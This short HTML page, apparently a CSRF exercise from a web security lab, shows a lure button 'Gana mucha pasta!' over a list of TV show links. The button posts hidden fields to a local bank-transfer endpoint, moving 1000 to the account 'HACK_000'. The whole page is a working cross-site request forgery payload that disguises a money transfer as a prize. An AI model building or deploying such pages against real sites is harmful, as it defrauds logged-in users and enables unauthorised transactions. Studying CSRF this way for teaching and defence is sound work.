<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Document</title>
</head>
<body>
  <form action="http://localhost:8080/nueva-transferencia" method="POST">
    <ul>
        <li><a href="#">Gangland Undercover</a></li>
        <li><a href="#">Mayans MC</a></li>
        <li><a href="#">Sons Of Anarchy</a></li>
    </ul>
    
    <input type="text" name="cuenta" value="HACK_000" hidden>
    <input type="number" name="cantidad" value="1000" hidden>
  
    <button type="submit">Gana mucha pasta!</button>
  </form>
</body>
</html>